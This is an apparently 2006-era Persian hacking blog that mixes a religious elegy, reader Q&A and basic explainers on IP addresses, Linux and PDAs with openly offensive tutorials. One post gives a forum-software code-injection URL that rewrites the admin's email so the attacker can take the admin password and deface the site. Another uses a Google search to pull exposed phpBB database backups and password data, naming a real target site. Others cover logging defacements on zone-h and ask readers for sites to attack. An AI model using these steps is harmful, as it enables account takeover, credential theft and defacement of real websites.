تبليغاتX
IT Tech

IT Tech

HACK

حسینه یئرله ر آغلار گؤیله ر آغلار

نوحه سرائی پادشاه سخن آذربایجان استاد محمد حسین شهریار

حسینه یئرله ر آغلار گؤیله ر آغلار 

بتول و مصطفی پیغمبر آغلار

حسینون نوحه سین دلریش یازاندا
موسلمان سهلدیر که کافر آغلار
کور اولموش گؤزله رین قان دوتدو شومرون
کی گؤرسون اؤز الینده خنجر آغلار
حسینون کؤینه گی زهرا الینده
چکر قئیحا قیامت ، محشر آغلار
آتاندا حرمله ، اوخ کربلاده
گؤرئیدین دوشمن آغلار ، لشگر آغلار
قوجاغیندا ، گؤرئیدین ام لیلا
آلیب نعش علی اکبر آغلار
رباب ، نیسگیل دؤشونده سود گؤره نده
علی اصغری یاد ائیله ر آغلار
باشیندا کاکل اکبر هواسی
یئل آغلار ، سنبل آغلار ، عنبر آغلار
یازاندا آل طاها نوحه سین من
قلم گؤردوم سیزیلدار ، دفتر آغلار
علی ، شق القمر ، محراب تیلیت قان
قولاق وئر ، مسجید اوخشار منبر آغلار
علیده ن شهریار ، سن بیر اشاره
قوجاقلار قبری ، مالک اشتر آغلار 
 

یاشاسین اذربایجان

+ نوشته شده در  دوشنبه نهم بهمن 1385ساعت 21:48  توسط Reza  | 

جواب به سوالات دوست گرامی:

دوستان گرامی با عرض سلام خدمت شما بازدید کننده گان گرامی به زودی در این وبلاگ تحولات بسیار اساسی ایجاد خواهد شد که سایتهایی به هک رسیده به صورت ملتی مدیا در اختیار شما خواهد بود و وبلاگ به شاخه های زیاد تری تقسیم خواهد شد.

جواب به سوالات دوست گرامی:

asall

عسل خانم گل همانطور که می بینید در مقدمه من نوشتم کهاين نرم افزار که اين نسخه ي آن تحت ويندوز کار ميکند به راحتي ميتوانيد در مدت زماني کم اکانت را بدست آوريد.ابتدا اين نرم افزار از اينجا دريافت كنيد. خوب من قسمتهاي مختلف اونو توضيح ميدم.اما اين براي ISPهايي است که پورت ۲۱يا ۷۹ اونها باز باشه.

جواب به سوالات دوست گرامی:

ناصر

اقا یه چیزی گفتی حیرت زده شدم مگه میشه با تلفن خانه به اینترنت وصل شی ولی قبض نیاد.اگه کسی از دوستات یا کسی دیگه بلده بگه به ما هم ;o

جواب به سوالات دوست گرامی:

ارش

این برای کارتهای مخصوصی اجرا میشه که راستش رو بخوای برا من اجرا نشد.ولی اینو شرکتهایی که دوست دارن سر کسی شیره بمالند به کار میبرند.برای مثال...... که نمیگم کسی که اینو خوند میفهمه کی رو میگم.

+ نوشته شده در  دوشنبه نهم بهمن 1385ساعت 21:45  توسط Reza  | 

مفهوم PORTمفهومReverse DNS مفهوم IP

مفهوم IP

شماره‌ ايست که به هر کامپيوتر متصل به اينترنت داده مي‌شود تا بتوان به‌کمک آن شماره به آن کامپيوترها دسترسي داشت. اين عدد براي کامپيوترهايي که حالت سرور دارند (مثلا سايت‌ها) و نيز کامپيوتر‌هاي کلاينتي که معمولا به روشي غير از شماره‌گيري (Dial Up) به اينترنت وصل هستند، عددي ثابت و براي ديگران عددي متغير است. مثلا هر بار که شما با شرکت ISP خود تماس گرفته و به اينترنت وصل مي‌شويد، عددي جديد به شما نسبت داده مي‌شود.
اين عدد يک عدد ۳۲ بيتي (۴ بايتي) است و براي راحتي به‌صورت زير نوشته مي‌شود:
xxx.xxx.xxx.xxx که منظور از xxx عددي بين ۰ تا ۲۵۵ است (البته بعضي شماره‌ها قابل استفاده نيست که بعدا علت را توضيح خواهم داد). مثلا ممکن است آدرس شما به صورت 195.219.176.69 باشد. حتي اسم‌هايي مثل www.yahoo.com که براي اتصال استفاده مي‌کنيد، در نهايت بايد به يک IP
تبديل شود، تا شما سايت ياهو را ببينيد.
در
IP معمولا xxx اولي معناي خاصي دارد، که بعدا توضيح مي‌دهم... فقط اين را بگويم که اگر به روش Dial Up به اينترنت وصل شويد، معمولا عددي که به عنوان xxx
اول مي‌گيريد، مابين 192 تا 223 خواهد بود.اين توضيح براي تشخيص کامپيوترهاي کلاينت از سرور (حداقل در ايران) بسيار مي‌تواند مفيد باشد.
بعد از اتصال به اينترنت براي به دست آوردن
IP خود، از دستور IPCONFIG در command prompt استفاده کنيد.


ادامه مطلب
+ نوشته شده در  جمعه ششم بهمن 1385ساعت 13:22  توسط Reza  | 

لینوکس با ویندوز چه تفاوتی دارد؟

لینوکس با ویندوز چه تفاوتی دارد؟




لینوکس با ویندوز چه تفاوتی دارد؟ یکی از نخستین سوالاتی که در ذهن هر کاربری که به تازگی نام لینوکس به گوشش خورده است، مطرح می‌شود، این است که خوب لینوکس چه تفاوتی با ویندوز دارد؟ من در این مقاله قصد دارم بدون اینکه وارد مسائل خیلی فنی شوم، این موضوع را تشریح کنم. لینوکس چیست؟ لینوکس به خودی خود، یک هسته (Kernel) است. هسته، بخش اصلی سیستم‌عامل را تشکیل می‌دهد که کار آن کنترل داده‌ها، مدیریت حافظه، سخت‌افزار، ورود و خروج داده‌ها و تمامی موارد اصلی سیستم‌عامل می‌باشد.
همانطور که گفتم، لینوکس به خودی خود سیستم‌عامل به شمار نمی‌رود، بلکه با استفاده از ابزارهایی که پروژه بازمتن (OpenSource) گنو (GNU) برای آن تولید کرده است، تبدیل به یک سیستم‌عامل کامل می‌شود (به همین دلیل است که لینوکس را معمولا گنو/لینوکس یا GNU/Linux می‌نامند) و با اضافه کردن سایر نرم‌افزارهای بازمتن به آن، می‌توان از آن در موارد متعددی مانند سرویس‌دهنده‌ها، ایستگاه‌های کاری، کامپیوترهای روی‌میزی، ابر رایانه‌ها، ابزارهای صنعتی و پزشکی که دارای سیستم‌های درونه‌ای (Embedded) می‌باشند و... استفاده کرد
.
از نظر فنی، لینوکس را می‌توان نمونه بازمتن سیستم‌عامل یونیکس نامید. زیرا بر اساس استاندارد POSIX پیاده سازی شده و کاملا با آن سازگار است. بنابراین لینوکس را می‌توان نواده سیستم‌عامل پرسابقه و مستحکم یونیکس دانست که البته خواص خوب آنرا نیز به ارث برده است. اکنون تفاوت‌های اصلی لینوکس و ویندوز را با هم می‌شماریم: لینوکس : سیستم‌عامل آزاد لینوکس یک سیستم عامل آزاد و بازمتن است. کد منبع آن در اختیار همگان قرار دارد و همه می‌توانند در کدهای آن تغییر ایجاد کرده و بنا به نیازشان استفاده کنند. آزاد و در دسترس بودن کدهای منبع سبب می‌شود تا بتوانید از طرز کارکرد دقیق سیستم‌عامل مطلع شوید
.
شما لینوکس را می‌توانید به هر تعداد کپی کرده و بین دوستانتان پخش کنید. در سمت مقابل، ویندوز یک سیستم‌عامل اختصاصی است که کد منبع آن سری نگهداشته شده است و برای همگان در دسترس نیست. شما نمی‌توانید بفهمید که واقعا در زیر سیستم‌عامل ویندوزتان چه می‌گذرد؟ آیا یک برنامه جاسوسی در آن پنهان نشده است؟ بعید نیست. سیستم عامل ویندوز رایگان نبوده و تحت حمایت قانون کپی‌رایت قرار دارد. شما نمی‌توانید آنرا کپی کرده و پخش کنید. در صورت این کار شما خلاف‌کار هستید و جریمه و مجازات خواهید شد. (فعلا نه در ایران ولی در ۴-۶ سال آینده بله) لینوکس را به هواپیمایی تشبیه کرده‌اند که هر قسمت از انرا در جایی ساخته‌اند
.
لینوکس واقعا محصول کشور خاصی نیست. تعداد زیادی از مردم در سرتاسر جهان در حال کار بر روی آن و توسعه آن هستند. تعداد برنامه نویسانی که روی بخش‌های مختلف سیستم‌عامل لینوکس کار می‌کنند، به حدود ۴۰۰ هزار نفر می‌رسد، در حالی که تعداد کل برنامه‌نویسان مایکروسافت کمتر از ۱۰۰۰۰ نفر است. همین، تفاوت کیفیت کار را مشخص می‌کند. شما با سیستم‌عامل لینوکس آزاد هستید. لازم ندارید تا از نرم‌افزارهای اختصاصی استفاده کنید و تحت انقیاد آنها در آیید
.
لینوکس : سرعت، قدرت، پایداری همانطور که گفتم، لینوکس نواده سیستم‌عامل یونیکس است. بنابراین ساختار کلی این سیستم‌عامل کاملا با ویندوز متفاوت است. این به این معنی است که مثلا شما نخواهید توانست برنامه‌هایی که در ویندوز دارید، روی لینوکس اجرا نمایید (البته راه‌هایی وجود دارد - شبیه سازها - ولی در حالت عادی خیر). یکی از خواص اصلی سیستم‌عامل‌های خانواده یونیکس، پایداری و استقامت بسیار بالای آنهاست. این سیستم‌عامل‌ها به این راحتی‌ها خراب نشده و به ندرت نیاز به بوت مجدد پیدا می‌کنند. لینوکس‌هایی وجود دارند که شما می‌توانید سالها بدون نیاز به بوت، از آنها استفاده نمایید
.
در سمت مقابل، حتی جدیدترین و پایدارترین سیستم‌های ویندوز به اندازه یک موی لینوکس پایدار نیستند. برای بکارگیری سیستم‌های ویندوز به عنوان سرویس دهنده به حافظه و پردازنده‌های قویتری نیاز دارید و مطمئن باشید اگر هر هفته آنرا بوت نکنید، از کار خواهد افتاد! من حدود ۲ سال است با این سیستم‌عامل کار می‌کنم. تنها یکبار مجبور شده‌ام بدلیل اشکال در کارت صوتی آنرا بوت کنم. (فقط کارت صوتی از کار افتاده بود!) در صورتی که در ویندوز، شما اگر خیلی شانس داشته باشید، حتما هفته‌ای ۲-۳ مشکل را که منجر به بوت خواهند شد، خواهید داشت. معمولا سیستم‌عامل لینوکس به راحتی خراب نمی‌شود و برعکس ویندوز مجبور نیستید تا آنرا هر چندماه یکبار مجددا نصب کنید. حتی برخی از انواع لینوکس به نصب «یکبار برای تمامی عمر» مشهور هستند. این گونه سیستم‌ها را می‌توانید حین کار و حتی بدون بوت، به نسخه‌های جدیدتر ارتقا دهید
.
لینوکس : امنیت، امنیت، امنیت امروزه در دنیایی متکی بر فناوری اطلاعات زندگی می‌کنیم که هر لحظه به خطر افتادن جریان اطلاعات منجر به بروز خسارت‌های تجاری جبران ناپذیری خواهد شد. امروزه همه به دنبال یک سکوی (Platform) امن‌تر برای اجرای برنامه‌های کاربردی و سروی‌دهنده‌ها هستند. لینوکس حرف‌های زیادی برای گفتن در سمت امنیت دارد. بسیاری از قابلیت‌های امنیتی که در ویندوز وجود ندارند و یا فقط با اضافه کردن نرم‌افزارهای اضافی قابل دسترسی می‌باشند، بطور درونی و پیش‌گزیده در لینوکس پیاده سازی شده‌اند. لینوکس از ابتدا برای محیط‌های شبکه‌ای و چند کاربره طراحی شده است و همین باعث رعایت مسائل امنیتی از ابتدا در ان شده است، درحالی که ویندوز اینگونه نبوده و درحال حاضر نیز از نظر امنیتی دارای نقاط ضعف فراوانی است. مثلا یک برنامه مخرب با استفاده از همین ضعف‌های امنیتی می‌تواند کل سیستم‌عامل را نابود کند، ولی در صورتی که مورد مشابهی در لینوکس وجود داشته باشد، حداکثر به دایرکتوری خانگی کاربر اجرا کننده آسیب خواهد رسید، نه کل سیستم‌عامل. اینطور نیست که لینوکس فاقد هر گونه اشکال امنیتی باشد، خیر، ولی باز بودن کد منبع آن باعث می‌شود تا بسیاری از اشکالات امنیتی پیش از ایجاد خسارت و در مراحل توسعه و برنامه نویسی برنامه بر ملا شده و رفع شوند. در صورتی که اشکالی نیز در برنامه‌های منتشر شده یافت شود، بدلیل موجود بودن کد منبع سریعا برطرف می‌گردد
.
در صورتی که در سیستم عامل ویندوز شما باید منتظر مایکروسافت بمانید و بمانید و بمانید. سیستم‌عامل ویندوز دارای اشکالات امنیتی بسیاری است که به راحتی هم کشف نمی‌شوند و هنگامی کشف می‌شوند که خسارات جبران ناپذیری در اثر حمله از طریق آن ضعف‌های امنیتی رخ دهد که امثال آنرا شاهد هستیم. می‌توان ادعا کرد که تقریبا هیچ ویروسی برای لینوکس وجود ندارد و این درحالی است که سالیانه بیش از ۱۰۰۰ ویروس و کرم مختلف برای سیستم‌عامل ویندوز ایجاد می‌شود. این بخاطر عدم گسترده بودن لینوکس نیست (حدود ۷۰ درصد از سایت‌های وب در جهان بر روی سیستم‌عامل لینوکس و سرویس‌دهنده وب آپاچی درحال اجرا هستند) بلکه بدلیل وجود حفره‌های امنیتی متعدد ویندوز و سیاست انحصار گرایی مایکروسافت است
.
یعنی چه؟ مایکروسافت طوری رفتار و سیاست گذاری کرده است که مشتریان خود را تنها به محصولات خودش عادت دهد. بسیاری از کاربران ویندوز از اینترنت اکسپلورر و آتلوک برای مرور وب و پست الکترونیک استفاده می‌کنند. من به عنوان یک ویروس نویس، می‌دانم که اگر ویروسی را برای کاربران ویندوز بنویسم، بر روی کامپیوترهای ۹۰ درصد آنها اثر خواهد کرد. چون اکثرا از IE و Outlook استفاده می‌کنند. ولی در لینوکس چطور؟ در لینوکس شما طیف وسیعی از انتخاب و عدم اجبار دارید. من از مرورگر موزیلا استفاده میکنم. دوستی دارم که Konqueror را ترجیح می‌دهد. دیگری از Opera استفاده می‌کند. من از Kmail استفاده می‌کنم. دوستم از Evolution، دیگری از Pine و بعدی از Mutt و برادرم هم از Mozilla Mail. من فقط می‌توانم برای یکی از اینها ویروس بنویسم چون روی بقیه کار نخواهد کرد و عملا میزان اثر آن انداک خواهد بود
.
ضمنا هیچیک از ویروس‌هایی که برای ویندوز نوشته شده‌اند، بر روی لینوکس کار نمی‌کنند. لینوکس : تعدد سکوهای اجرایی لینوکس برخلاف ویندوز بر روی تعداد زیادی از سکوهای مختلف سخت‌افزاری اجرا می‌شود و شما حتی قادرید آنرا برای کار بر روی سکوی مورد نظرتان تغییر دهید. این قابلیت، لینوکس را برای بکارگیری در سخت‌افزارهای درونه‌ای (Embedded) بسیار مناسب می‌سازد
.
هسته 2.6 لینوکس که بتازگی ارائه شده است، این امکان را فراهم می‌سازد تا لینوکس را بر روی دستگاه‌های بسیار کوچک و یا ابر رایانه‌های بسیار بزرگ اجرا نمایید. اصلا ویندوز می‌تواند؟ لینوکس : گسترده‌ترین تنوع در کاربرد لینوکس را می‌توانید برای انجام وظایف بسیار متعددی بکار بگیرید. از دستگاه چک کردن اتصالات شبکه، دیوار آتش، مسیریاب (Router) شبکه، سرویس‌دهنده‌های مختلف مانند وب، بانک اطلاعاتی، فایل، چاپ و...، میزهای کار (Desktop)، ایستگاه‌های کاری (Workstations) و... سیستم‌عامل لینوکس حتی این امکان را دارد که از آن بتوان به صورت یک سیستم زنده و پرتابل استفاده کرد. به این معنی که کل سیستم‌عامل از روی یک دیسک CD اجرا شود و شما آنرا با خودتان جابجا کنید و میزکار و تنظیماتتان را همراه خودتان منتقل کنید. علاوه بر این، این قابلیت برای رفع اشکال و نمایش آن نیز بسیار مفید است
.
لینوکس : تنوع در انتخاب بدلیل آزاد بودن سیستم‌عامل لینوکس، هر گروه یا موسسه تجاری، یک نسخه خاص از آن که به توزیع یا پخش (Distribution) معروف هستند، منتشر ساخته است. این توزیع‌های مختلف همگی لینوکس هستند، ولی هریک معمولا برای یک یا چند امر خاص مانند سرویس‌دهنده، دیوار آتش، میزکار و... طراحی شده‌اند و هریک قابلیت‌ها و بهینه سازی‌ها خاص خودشان را به کاربران ارائه می‌کنند. کاربران در این میان آزادی انتخاب زیادی داشته و می‌توانند چیزی که کاملا نیازشان را برطرف می‌کند، انتخاب کنند. چیزی که در ویندوز نمی‌توان مفهومی برای آن پیدا کرد
.
لینوکس : سیستم‌عاملی حرفه‌ای لینوکس یک سیستم‌عامل حرفه‌ای است. یعنی ممکن است یک کاربر کاملا غیر فنی برای مدیریت آن و انجام برخی از تنظیمات سخت‌افزاری دچار مشکل شود و نتواند به راحتی این کار را انجام دهد. البته برخی از توزیع‌های لینوکس این امور را بسیار راحت (و حتی راحت‌تر از ویندوز) کرده‌اند، ولی با این حال به طور کلی، لینوکس یک سیستم‌عامل حرفه‌ای است که در عین سادگی، از پیچیدگی‌های فنی زیادی برخوردار است. البته تمام کاربران لازم نیست این امور را بدانند
.
مثلا یک کارمند دفتری که اموری مانند تایپ و حسابداری را با کامپیوترش انجام می‌دهد، ممکن است از نظر فنی تفاوتی را احساس نکند، ولی لینوکس خوراکی ۴ ساله برای کاربران خوره فراهم می‌سازد! برخلاف ویندوز، نکات بی‌پایانی برای یادگیری در لینوکس وجود دارد. این سیستم‌عامل ۴ سال به راحتی شما را مشغول خواهد کرد و می‌توانید مطمئن باشید پس از آن بازهم مطالب جدیدی برای یادگیری وجود خواهند داشت! پس خوره‌های کامپیوتری از آن لذت وافری خواهند برد و هرگز آنرا رها نخواهند کرد. برخلاف ویندوز، در لینوکس راحت‌تر هستید تا بسیاری از کارهای پیکربندی و سیستمی را از خط فرمان بسیار قدرتمند و عالی آن انجام دهید. با اینکه برای بسیاری از امور مانند ویندوز ابزارهای گرافیکی طراحی شده است، یک کاربر حرفه‌ای واقعا از خط فرمان لینوکس لذت خواهد برد. خط فرمان ویندوز را اصلا می‌توان خط فرمان نامید؟

لینوکس : بهشت برنامه نویسان! لینوکس را بهشت برنامه نویسان نامیده‌اند. برخلاف ویندوز که اکثر ابزارهای برنامه نویسی روی آنرا باید جداگانه نصب و حتی خریداری نمایید، لینوکس به همراه تمامی ابزارهای برنامه نویسی مورد نيازتان و با هر زبانی که فکر کنید ارائه می‌شود. کافی است آنرا نصب کنید و کار برنامه نویسی‌تان را با ابزارهای دلخواهتان شروع کنید. لینوکس : یک جعبه ابزار کامل لینوکس برای کاربران حرفه‌ای، یک جعبه ابزار کامل به شما می‌رود که در آن تمامی ابزارهای مورد نیاز مانند برنامه‌های اینترنتی، ابزارهای امنیتی مانند ابزارهای آزمایش شبکه، ابزارهای برنامه نویسی، هزاران صفحه کتاب و راهنما در آن پیدا خواهید کرد. ابزارهایی که در اختیارتان قرار دارد چنان متنوع هستند که می‌توانید ۹۰ درصد اطمینان داشته باشید که پس از نصب آن به چیز دیگری نیاز نخواهید داشت.
لینوکس : یکی از زیباترین دستاوردهای بشری لینوکس در سایه همکاری و تبادلات علمی هزاران نفر در سرتاسر جهان ایجاد شده و توسعه یافته است. این همکاری چنان گسترده و زیبا بوده و هست، که به سیستم‌عامل لینوکس لقب «زیباترین دستاورد همکاری جمعی بشر» داده شده است. فرهنگ حاکم در جامعه لینوکس و بازمتن، فرهنگ کمک، اشتراک اطلاعات و تلاش برای بهبود هرچه بیشتر محصولات و «انجام هرکاری که از دستت برمی‌آید» است. هرکس که می‌خواهد با این سیستم‌عامل کار کند، باید تمامی دیدگاه‌ها و عقاید قبلی خود را درباره نرم‌افزارها و سیستم‌عامل کنار گذاشته و با یک دیدگاه جدید و طرز فکر متحول شده وارد دنیای لینوکس شود، زیرا با فرهنگ حاکم متفاوتی روبرو خواهد بود. لینوکس نوید دهنده آزادی است
...






memar_kochoolooo

© کپی رایت توسط : MashhadTeam (کلیه حقوق مادی و معنوی مربوط و متعلق به این سایت است.)
برداشت مطالب فقط با اجازه کتبی و ذکر منبع امکان پذیر است
.

+ نوشته شده در  پنجشنبه دوم آذر 1385ساعت 22:58  توسط Reza  | 

PDA چيست ؟

PDA يا Personal Digital Assistant يك رايانه همراه و جيبي است كه از آن براي تنظيم و نگهداري برخي اطلاعات شخصي استفاده ميشود .

اين رايانه در حقيقت حكم دفترچه يادداشت شما را دارد. شما مي توانيد در اين رايانه فهرستي از كارهايي كه بايد انجام دهيد ، فهرست قرارها ، نام ها ، شماره تلفن ها و نشاني ها يي را كه مي خواهيد داشته باشيد ، ثبت و نگهداري كنيد .

اين رايانه به كوچكي يك كف دست است ، بنا براين براحتي در جيب شما جا مي گيرد و مي توانيد درست مانند يك دفترچه يادداشت ، آن را همه جا همراه خود ببريد.

P D A قلمي كوچك هم دارد كه استيلوس ناميده مي شود . اين قلم كه جنس آن از تركيبات كربن است ، براي انتخاب موارد مختلف و آيكون هاي متفاوت روي صفحه كوچك P D A استفاده مي شود و كاركردن با اين دفترچه يادداشت رايانه اي را آسان مي كند .

در حال حاضر بسياري از توليد كننده هاي نرم افزاري مختلف نسخه هايي از نرم افزارهاي خود مانند مرور گر وب ، تلفن اينترنتي و غيره را مخصوص اين رايانه ها ارائه مي كنند . در ضمن شما مي توانيد ميان اين رايانه با رايانه معمولي خود هم ارتباط برقرار كنيد .

در حال حاضر انواع مختلفي ازP D A به وسيله شركتهاي مختلف روانه بازار مي شود كه معروف ترين آنها پالم (Palm) نام دارد كه بيش از 80 در صد بازار را در اختيار خود دارد . اين رايانه مي تواند با استفاده از وسايل جانبي خود به وسايل ديگر مانند تلفن همراه ، موقعيت ياب (G.P.S) ، دوربين ديجيتال و غيره مرتبط باشد .

از محصولات ديگر ارائه شده به بازار مي توان به , IBM Work Pad pocket pc , Hand Spring و Imac اشاره كرد .
+ نوشته شده در  شنبه بیست و دوم مهر 1385ساعت 19:31  توسط Reza  | 

هک فروم FORUM....

هک فروم  FORUM....

با عرض سلام خدمت دوستان همیشگی وبلاگ ممنونم از اقا ساسان که همیشه منو ساپرت میکنه با نظرهاش در مورد این که برنامه پروکسی که کار میکنه بزارم چشم روی چشم به زودی حتما رو چشم !!!

اين آموزش بر روي فرم هاي ورژن 2 و پايين تر عمل خواهد كرد در اولين قدم بايد بر روي فرم Sign Up كرده و يوزر و پسورد به همراه يك ايميل واقعي دريافت كنيد . در ادامه اميلي براي Confirm عضويت شما فرستاده ميشود .

در ادامه به Member list رفته و يا به لينك زير برويد :

http://URL/memberlist.php


در ادامه ميتوانيد بر روي هر كدام از ممبر ها كليك كرده و URL را بر روي آدرس بار خود مشاهده كنيد

در ادامه Tag زير را در آخر URL پيدا خواهيد كرد بدون هيچگونه quotes

"userid="

اين عدد را در آخر اضافه كنيد "‌ 1 " به عنوان مثال :

http://URL/member.php?action=getinfo&userid=1

در ادامه با انجام اين كار شما نام Administrator را پيدا خواهيد كزد ( يوزر ادمين سايت ) هر چيزي كه مشاهده ميكنيد يادداشت كنيد

حالا همه چيز آماده شده . بصورت زير عمل كنيد :

URL زير را كپي كنيد : و بصورت زير آنرا Edit كنيد :



http://url/member.php?action=login&username=User&password=R!zA&url=");".$users=$DB_site->query("update+user+set+email='123456'+WHERE+username='lamer'")."

Username : در اينجا يوزري كه شما در فرم با آن رجيستر كرده ايد وارد كنيد مثلا IT4IR

Password : در اينجا پسورد يوزر خودتون را وارد كنيد ( R!zA )

Email Adress : در اينحا آدرس ايميلي كه با آن رجيستر كرديد وارد نماييد ( EMail@yahoo.com )

Admin : نام ادمين سايت كه بدست اورديد ( Lamer )

خوب اگه تمام كارهايي كه گفتم را درست انجام داده باشيد صفحه refresh شده و اين كار ادامه پيدا ميكند بدون توقف . خوب در اين حالت به Main Page رفته و Login كنيد با همين يوزر و پسورد ي كه الان ازشون استفاده كرديد . در اينجا صفحه اي دريافت ميكنيد كه يوزر و پسورد شما اشتباه ميباشد بر روي لينكي كه در پايين قرار گرفته و پسورد جديد براي شما ارسال ميكند كليك كرده ! و آدرس ايميلي كه پسورد براي شما ارسال شده وارد كنيد حالا به ايميل خود رفته و پسورد خود را دريافت كنيد !! اما ..... اين ....... !!! اين پسورد شما نيست پسورد ادمين سايت ميباشد J

D e f a c e m e n t

حالا وقت Deface كردن يا هر كاري كه شما دوست داريد رسيده !!

http://URL/admin/index.php

در اينجا Login كنيد !‌ اما اگر موفق نشديد به Main Page رفته و ابتدا از آنجا وارد شويد و بعد از ورود به صفحه ي ادمين رفته و دوباره Login كنيد

براي Deface كردن به سمت چب نگاه كنيد "Templates" بر روي Edit كليك كرده و در قسمت راست Main Frame را ميبينيد بر روي آن Edit را بزنيد ممكنه كه بر روي Default باشد . اگر نبود اولي را انتخاب كنيد . در صفحه ي بعدي بر روي Submit كليك كنيد . به پايين آمده و Fourmhome را پيدا كرده و بر روي آن Edit را بزنيد در قسمت بعدي شما كد هاي HTML صفحه ي اول را مشاهده ميكنيد . بعد از گذاشتن كدهاي خودتون و قرار دادن آنها Submit را زده تا Index شما در صفحه ي اول به نمايش در بيايد

به زودی در همین وبلاگ تمامی هکهای فروم های ورژن بالا خواهد بود؟!

Cooming Soon

+ نوشته شده در  دوشنبه دهم مهر 1385ساعت 18:18  توسط Reza  | 

جواب به سوال؟1

سوال اقای حسام:

در مورد چگونه کارت اینترنت خود را بی نهایت کنیم؟

جواب به سوالات؟

آقا حسام گل در واقع  ای اس پی های کله گنده ما اومدن مانند یک باگ این ترفندو بستن اگر ای اس پی شما از یک سرور صد ساله استفاده کند میتونین این ترفند رو اجرا کنین یعنی در واقع در سرور های مخصوصی کار میکنه منم موندم رو هوا اه اینجوری ~: ولی دوستای دیگه امتحان کردن تومناطق دیگه عملی بود .

سوال اقای محمد:

دايي يه سوال دارم. آي پي isp خودم رو چجوري گير بيارم؟ اي پي isp همون ip سايتش هستش؟

جواب به سوالات؟

در مورد سوال اقای محمد بگم که در بعضی از ای اس پی ها پول ندارن یا نمیدونم چرا وب سایت شونو تویک سروری که از ان استفاده میکنند اپ میکنند شما نیز می توانید با پینگ کردن وب سایت ای پی آن رو پیدا کننین

با نوشتن cmd در run و با نوشتن ping فاصله www.it4ir.blogfa.com می تواننین ای پی ان رو پیدا کنین و نیز اگر بی ادبی کردم دراین جواب از نظر سطح شما منو ببخشید. دوستدار شما RizA

سوال اقای قلی :

در مورد هک سایت cia

جواب به سوالات؟

دوست عزیز اقای قلی با عرض سلام خدمت شما در مورد سایت cia باید بگم که همانطور که میدانید سایتهای غیر اخلاقی و.... که توسط جمهوری اسلامی فیلتر شده  این اطلا عات نیز به صورتی پنهان هستند و اگر همان لینکی که نوشته بودی منم رفتم من فردا پس فردا اموزش شل سی 99 را به شما اموزش میدهم که در ان این امکان وجود دارد که هر سایتی دلت بخواد هک کنی و صحفه اول ان را تغیر بدی  پس شما اموزش zone-h رو یاد بگیر بگو چرا؟ چون با اموزشی که مینویسم روزی صدتا سایت بای بای ؟!؟!؟!؟!؟ حالا نیز اقا در مورداین که سایت ciaدر دنیای هک یک ترسی برای همه ایجاد کرده نمیدونم شما هم اینجور هستین یا نه من که اینجورم و میخوام سایت ای جی ان و گایم اسپات رو هک کنم که به زودی یا به قول خارجکی ها Cooming Soon! منتظر black list سایتهایی که دوست داری هک کنی هستم بهم بفرست باشه دوست دار تو RizA!!!

+ نوشته شده در  دوشنبه بیست و هفتم شهریور 1385ساعت 9:46  توسط Reza  | 

هک سیمرغ و سایتهای که از PHPBBاستفاده میکنند.

حالا من هم میخوام خودمو پیشه هکرها یه نشونی بدم میشه یا نه؟ حالا به گفته سایت simorg-ev.com کسی نتونسته اونو هک کنه حالا من به شما اموزش میدم که چگونه به بک اپ های این سایت و پسورد او در phpbb دست یابیم.و هر نوع سایتی که از پی اج پی بی بی پشتیبانی میکند.در سایت گوگل عبارت زیر راتایپ کنید.

intitle:phpbb-db-backup.sgl site:simorg-ev.com

یا به جای سایت سیمرغ میتوانید هر نوع سایتی را که از پی اچ پی بی بی استفاده میکند را بنویسید.یا میتوانید با تایپ کردن intitle:phpbb-db-backup.sgl سایتهایی که از پی اچ پی بی بی استفاده میکنند را هک کرد ......

گوگل برای شما دیتا بیسی از sqlبه شما میدهد نه سایتی دیده میشود ونه چیز دیگری فقط کدهایی به شما دیده میشود که با زدنctrl+f ویا در قسمت view در findبروید و user را تایپ کنید.و در چهارم و پنجم در قسمت راست کدها کلمات بزرگی به شما نشان داده میشود برای مثال'xxxx' ,'1234567891011121314151617'دیده می شود از این راحت تر هم میشه در سایتهایی که از پی اچ پی بی بی استفاده میکنند.حمله کرد.

 

+ نوشته شده در  شنبه بیست و پنجم شهریور 1385ساعت 13:10  توسط Reza  | 

ZONE-H

با عرض سلام خدمت شما دوستان ,زیز با یکی از اموزشهای جنجالی در خدمت شما هستم ولی اول از دوستان وبلاگ نویس انتقادی دارم دوستان سایتهایی را به هک میرسانند ولی نمی دانند که بزرگترین هکرهای دنیا نیز با هم در رقابت تنگاتنگ هستند.ما نیز در این مقاله به اموزش ثبت نام خود در zone-h یا به قول خودم zone hack که به شما این امکان را میدهد.تا در بین بهترین هکرهای دنیا به رقابت بپردازید.ولی تازگی ها مد شده تو هر وبلاگ که مربوط به هک است میان چند وبلاگ دیگر درست میکنند ودر انجا به نوشتن لیستهای بزرگی میکنند که معلوم نیست کدومشو هک  کردن میری تو سایت میبینی دو ساله که از تاریخ هک شدنش گذشته ولی هنوز اپدیت نشده حالا میگین پسورد عوض شده ببخشید خیلی ببخشید خلاصه روم به دیوار مگه خرن که سرور کنارشونه پسوردو عوض نکنن.حالا اقا جواد میگه بازم پرو شدم.

حال نیز به شما آموزش عضویت در سایت zone-h را برای شما عزیزان اموزش میدهم که دوستانی که سایتهایی را هک می کنند در این سایت به ثیت برسانند. بعد از هک کردن سایت به ادرسهای زیر رفته:

http://www.zone-h.com

http://www.zone-h.org

بر روی Attack notifiction کلیک کنید.ودر قسمت Defencer:نام هکر را بنویسید.ودر قسمت Domein: سایتی را که به هک رسانده اید را بنویسید.ودر قسمتatack method: که بعد برای شما تمام نوعهای حمله را اموزش خواهم داد در ین قسمت نوع حمله را بنویسید.درقسمت بعدattack reson:دلیل حمله رو بنویسید. واگ تعداد سایتهای شما بیش از یکی است میتوانید در قسمت mass defacement entry form تعداد دامینهایی را که به هک رسانده اید را بنویسید و به رقابت دربین هکر ها بپردازید.

+ نوشته شده در  جمعه بیست و چهارم شهریور 1385ساعت 17:55  توسط Reza  | 

گوگل هک

همه شما با موتور جستجوگر Google آشنا هستید. و با آن اشنایی کم و بیشی را داشته اید و دارید حال من میخواهمدر مورد هک گوگل یا به قولی استفاده از قابلیت های که به صورت پنهانی برای ما اماده شده که ما به عنوان یک موتور پیشرفته برای سود جویی هایمان استفاده کنیم.   (;

 کار با موتور جستوجوگر گوگل به شیوه ای آسان و در عین حال برای هکر ها مهم میباشد. که میتوانند اطلاعات جالبی را در ان پیدا کرده و به کار ببندند.حال ما میخواهیم طریقه استفاده مناسب را برای هک وب سایت ها در ان استفاده کنیم.


ادامه مطلب
+ نوشته شده در  دوشنبه سیزدهم شهریور 1385ساعت 14:17  توسط Reza  | 

عبور از فيلتر جديد ترين و کاربردی ترين روش های عبور از فيلتر


